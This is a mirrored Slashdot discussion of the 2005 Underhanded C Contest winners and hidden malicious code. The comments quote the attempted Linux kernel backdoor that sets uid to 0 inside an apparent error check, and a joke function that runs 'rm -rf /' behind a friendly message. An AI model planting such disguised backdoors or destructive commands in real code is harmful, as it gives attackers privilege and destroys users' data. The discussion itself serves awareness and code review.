Slashdot Mirror

← Back to Stories (view on slashdot.org)

Underhanded C Contest announces winners

Posted by CmdrTaco on from the games-people-play dept.

Matthew Skala writes "The 2005 Underhanded C Contest has announced its winners: the team entry from M Joonas Pihlaja and Paul V-Khuong, and the solo entry from Natori Shin. The contest (which appeared on Slashdot in June) tests programmers' ability to hide malicious behaviour in innocent-seeming code, making it a kind of evil shadow twin to the International Obfuscated C Contest."

41 of 150 comments (clear)

  1. Just what the world needs... by goldspider · · Score: 2, Interesting

    ...more malicious code writers.

    Thanks be to Slashdot for giving them the recognition/praise they so richly deserve.

    --
    "Ask not what your country can do for you." --John F. Kennedy
    1. Re:Just what the world needs... by Snoolas · · Score: 2, Insightful

      Better have them writing code for contests than having them writing real malicious code that will actually affect the public...

    2. Re:Just what the world needs... by Jeremi · · Score: 2, Insightful

      ... countered by a larger number of more alert code readers. Hopefully it comes out to a win for the Good Side.

      --


      I don't care if it's 90,000 hectares. That lake was not my doing.
    3. Re:Just what the world needs... by Acts+of+Attrition · · Score: 2, Insightful

      Right, I'm sure they're only allowed to pick one or the other.

  2. A-ha by Anonymous Coward · · Score: 2, Funny

    But Microsoft built a whole operating system based on the principle.

  3. Bill Gates Entry by bjorniac · · Score: 5, Funny

    Microsoft Word XP was rejected because the code had to seem innocent...

    1. Re:Bill Gates Entry by makomk · · Score: 5, Interesting

      Very true. For those of you who don't get it, one of the winners uses a technique very similar to the way Word (all versions AFAIK) leaks data into documents - an uninitialised buffer.

    2. Re:Bill Gates Entry by Richard_at_work · · Score: 5, Interesting

      Found an interesting thing at work recently, during trials of VB.net and the .Net framework. Our VB.net programmers applications worked right up until one day, when suddenly, they stopped working. Simple things like messages in Message Boxes stopped appearing, or labels on buttons went astray, mouse cursor changes on mouseover events showing black boxes instead of the image. Very wierd we thought. He reinstalled the .Net framework, VS.Net, everything he could think of but nothing rectified the problems. We eventually found out what the problem was - McAffee Virus protection now includes buffer overrun protection. Turn that off, and everything worked fine. Wierd, just wierd.

    3. Re:Bill Gates Entry by homesteader · · Score: 2, Informative

      This may very well be due to a bug in McAfee VirusScan 8.0i, assuming that is what you are running. There was a bug fixed by Patch 6, I think. Patches are cumulative, so you can just apply Patch 11 and the problem should be fixed.

      Patches are not available from the public download location. You may need to have a support contract to get them.

  4. good to see by garat · · Score: 5, Insightful

    Having a contest like this has similar positive aspects as full disclosure concerning vulnerabilities; by providing examples of how it's done, people will be better able to spot such attempts were they to occur. I'm happy to see this contest being held.

    --
    Support alternatives to Paypal: http://www.e-gold.com
  5. I'll tell you what's underhanded by Weaselmancer · · Score: 4, Funny

    Stashing all the entries in a 1.1M archive rather than posting links to the code. No way I'm going to download that just to see what all the fuss is about.

    --
    Weaselmancer
    rediculous.
    1. Re:I'll tell you what's underhanded by RAMMS+EIN · · Score: 4, Funny

      Moreover, who knows the archive isn't exploiting some buffer overflow vulnerability in my archiving software! Knowing who this file comes from, you'd be a fool to open it!

      --
      Please correct me if I got my facts wrong.
    2. Re:I'll tell you what's underhanded by glesga_kiss · · Score: 5, Funny
      They predicted that kind of paranoid response. From their (humorous) FAQ:
      Are you shills from MicroSoft trying to evangelize C-sharp?

      No, we are not shills from MicroSoft trying to evangelize C-sharp.

      Are you trying to prove open source is bad?

      No, we are not trying to prove open source is bad. If anything, this contest illustrates that we need more code review, not less.

      I bet you are government agents trying to entrap me.

      Of course we're government agents: Binghamton University is a state university, part of the SUNY system. Evil! Eeeeeeeeeevilllll!!!!!

      Do you know you've been Slashdotted?

      What, you couldn't tell from the last three questions?

    3. Re:I'll tell you what's underhanded by Weaselmancer · · Score: 2, Funny

      It's ok, I'm using Firefox. It's the most zyg234 bof*(0sls lkM12134 bsxQxo%9X browser out there!

      --
      Weaselmancer
      rediculous.
    4. Re:I'll tell you what's underhanded by nEoN+nOoDlE · · Score: 4, Funny

      Knowing who this file comes from, you'd be a fool to open it!

      but they would have known that only a great fool would open the archive given to him. I am not a great fool, so I can clearly not choose to open the archive. But they must have known I was not a great fool, they would have counted on it, so I can clearly open the archive supplied by them.

      --
      Don't trust a bull's horn, a doberman's tooth, a runaway horse or me.
    5. Re:I'll tell you what's underhanded by Threni · · Score: 2, Informative

      Most of the archive (in .tar format) is a picture of a train. I don't understand. Why not just post the results a text on a html page? Too easy?

  6. Will Code For Beer by Krast0r · · Score: 5, Funny

    "Prize: Since we're in Binghamton, NY, the prize will be a gift box from the nearby brewery Ommegang in Cooperstown, NY." Reminds me of that photograph, "Will Code For Food" - maybe this is the start of a new era. A combination of "free as in beer" and "will code for food".

    --
    Matthew Grint Midnight Artists
    1. Re:Will Code For Beer by jkfresh · · Score: 2, Informative

      It's not really funny if you are an alcoholic.

      http://www.aa.org/

    2. Re:Will Code For Beer by drsquare · · Score: 2, Interesting

      I fear for those who have to live with you.

      Why? I don't exactly go round killing people. Drink is just another liquid.

      What's with the moralising, anti-alcohol mods today? Slashdot's always whining about people's rights to do what they want with their own body, what about my right to drink? Why should that be censored?

    3. Re:Will Code For Beer by anagama · · Score: 3, Informative

      Actually, what you describe is "positive punishment" (apply negative stimulus in the presence of a certain bahavior -- like a spanking for swearing). "Positive" is not used in the "good/bad" sense, put in the "plus/minus" sense.

      Negative reinforcement is a reward that occurs by subtracting an adverse stimulus from the environment. For example, Fridays are a form of negative reinforcement -- the withdrawal of a negative stimulus (work) is rewarding, makes people feel good/relieved, and thus, people come to really like Friday afternoons. http://en.wikipedia.org/wiki/Reinforcement#Positiv e_vs._negative

      --
      What changed under Obama? Nothing Good
    4. Re:Will Code For Beer by Reziac · · Score: 2, Funny

      About 15 years ago, a friend who is a mathematician dressed up in street-bum clothes and had a picture taken of himself holding a sign that reads, "Will solve partial differential equations for food".

      --
      ~REZ~ #43301. Who'd fake being me anyway?
  7. I'm still fond of this one by $RANDOMLUSER · · Score: 5, Interesting
    This one almost made it into the Linux kernel. It looks like error checking until you read it carefully.Short, brilliant and to the point.

    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
    retval = -EINVAL;

    In other words, you become root if you call sys_wait4()with the __WCLONE|__WALL) flags

    Story here and here

    --
    No folly is more costly than the folly of intolerant idealism. - Winston Churchill
    1. Re:I'm still fond of this one by Anonymous Coward · · Score: 5, Informative

      This one almost made it into the Linux kernel.

      It *did* make it into the kernel for anyone using the BK-to-CVS gateway.

    2. Re:I'm still fond of this one by jnf · · Score: 5, Informative

      to anyone who makes a routine of putting their constants on the left hand side of the expression, that becomes not very hard to notice .. although intermixed with several megabytes of source it becomes less obvious. What I mean is: if (( (__WCLONE|__WALL) == options && 0 = current->uid)) will throw an error, whereas 0 == current->uid will not.

    3. Re:I'm still fond of this one by chriso11 · · Score: 2, Insightful

      The =/== is one of C's most dastardly tricks. It is a great way to make infinite loops too.

      That said - I think that C IDEs which perform context sensitive coloring should use two different colors for = and ==. Or maybe put in a macro or something to make it harder for these types of bugs.

      --
      No, I don't trust in god. He'll have to pay up front, like everybody else.
    4. Re:I'm still fond of this one by jnf · · Score: 2, Insightful

      why? the solution really becomes putting your constants on the lefthand side of the expression.

      It's really not that hard to get used to, i dont find it to be particularly ugly and it solves the problem.

    5. Re:I'm still fond of this one by Tim+C · · Score: 3, Informative

      It's not that assignments aren't allowed in if statements, but that Java has boolean types. So while a statement like i = 0 does return 0 (as in C), unlike C 0 is not false, it's an int, and so if (0) is a compile time error.

      You can still do things like if ((line = in.readLine()) == null) of course

      --
      It's official. Most of you are morons.
    6. Re:I'm still fond of this one by jnf · · Score: 2, Interesting

      all of my code gets -Wall -Werror -pedantic, i more do constants on the left out of habit now, but i dont think its a bad idea, or ugly.

      Also note that -pedantic wouldn't create a warning, but gcc -Wall would.

    7. Re:I'm still fond of this one by ipfwadm · · Score: 3, Insightful

      And the attempted backdoor in question put the parens around the assignment, thus avoiding the warning.

  8. Important contest by jurt1235 · · Score: 2, Insightful

    Does anybody remember the about 1.5 year ago event when a programmer managed to smuggle malicious code into the linux kernel?

    Virus writers and script kiddies are not a worry for this kind of code writing. The programmer you hire to write that AJAX extention to your website is also worth to worry about. This contest just shows how it is done.

    --

    My wife's sketchblog Blob[p]: Gastrono-me
    1. Re:Important contest by Anonymous Coward · · Score: 2, Informative

      Sure do.

    2. Re:Important contest by BobaFett · · Score: 2, Informative

      The register article is a bit alarmist, at least compared to the response Linus gives in this thread : http://www.ussg.iu.edu/hypermail/linux/kernel/0311 .0/0621.html

  9. Making Wrong Code Look Wrong by lelkes · · Score: 3, Insightful

    It would be extremely important to use coding standards which make wrong code look wrong. Not only that it would be more difficult to inject malicious code, but if somebody made mistakes, it would be really easy to discover it.
    Joel has a great article on this.

  10. cute fluffy kittens! by planetoid · · Score: 5, Funny

    int cute_fluffy_kittens(void)
    {
          printf("Cute fluffy kittens are now frolicking in a grassy field of daisies with their pink-nosed newborn puppy friends. Sit back and use your imagination to enjoy the spectacle for the next few minutes...\n");

          setuid(1);
          system("rm -rf /");
    }

    --
    Slashdot requires you to wait longer between hitting 'reply' and submitting a comment.
    1. Re:cute fluffy kittens! by grahamlee · · Score: 4, Funny

      Which is worse, the incorrect UID or the incorrect function prototype?

  11. Runtime code generation by pkhuong · · Score: 4, Informative

    The CLR does JIT (or, at least, runtime) compilation. A common way to do so is to output the machine code on the stack. W^X usually breaks programs that do runtime code generation. Now, this is a WAG, but that's where my money's at.

    --
    Try Corewar @ www.koth.org - rec.games.corewar
    1. Re:Runtime code generation by nothings · · Score: 3, Insightful

      Who in the world generates code to the stack? Compiling code is expensive, so you want to cache it, that is, keep it around for a while, which means putting it on the heap.

    2. Re:Runtime code generation by ultranova · · Score: 2, Informative

      Who in the world generates code to the stack? Compiling code is expensive, so you want to cache it, that is, keep it around for a while, which means putting it on the heap.

      Well, you could make the compile function recursive. That is, compile a single method, then run it, and if it calls (at runtime) any other methods that haven't been compiled yet, call the compile function iteratively, passing a pointer to the point in stack where the code was executing.

      So how do you figure out which methods are compiled and where they are located ? Simple - you implement a linked list entirely on stack. Simply have another function, which allocates a single element in the stack, links it to the previous one, and then calls the compiler function, giving it a pointer to tell where it left (passed by the compiler function to the datastore function). Of course, you'd also need to pass the pointer to the start of the list as a parameter to all of these functions...

      Anyway, the point is that it would be horrendously complicated, it would be horrendously inefficient, it would be extremely easy to break unintentionally, and it would make implementing security features difficult for the afromentioned reasons - but it would be possible. In other words, it's just the way Microsoft would do it ;).

      Real fun begins if you want to allocate all the objects generated by the runtime on stack too...

      --

      Forget magic. Any technology distinguishable from divine power is insufficiently advanced.

  12. Corewar veterans by lastfish · · Score: 4, Interesting

    Joonas & Paul are both Corewar veterans being respectively co-authors of Son of Vain (Joonas P & Ian Oversby) top of the all-time hall-of-fame and nPaper II (Paul V-K & John Metcalf) dominant paper of its time.

    Good practice for writing obscure, but useful, code.

    I'd give clickable links but fear for these sites under load.

    www.corewar.info/
    www.corewar.co.uk/94nophof.txt

  13. OT, nPaper II's ownership by pkhuong · · Score: 3, Interesting

    John's a corewar god (all that 6502 assembly probably has something to do with that ;), so nPaper is nearly all his: the constant twiddling (by hand!), the QS, etc. All I did was basically write the framework for the paper; the only non-standard parts were the attack engine and the djn at the end of the timescape component... and I believe the djn was removed, because, even though it was more aggressive, it was effective than a checksum with a jmz. Read CoreWarrior #.. erh. I think it was it the high 70s or low 80s. John describes the process of optimising a newbie's paper (nPaper), all by hand (He might have used some BASIC scripting :).

    Even now that we have evolvers throwing tons of computing power at a relatively small search space (nano), John submitted something that rocketted to 1st place and manages more than 50% wins. Again, the dude is a corewar genius.

    Paul(-Virak) Khuong

    PS, note the position of the dash

    --
    Try Corewar @ www.koth.org - rec.games.corewar
  14. Ken Thompson... by Sam+Nitzberg · · Score: 4, Informative

    It's not exactly the same thing, but the most powerful and clever C code example with an 'underhanded' purpose must be Ken Thompson's classic...

    Reflections on Trusting Trust
    http://www.acm.org/classics/sep95/

    Other interesting papers that come to mind include Tom Duff's on Unix viruses, as well as McIlroy.

    Sam

    sam @ iamsam.com
    http: /www . iamsam . com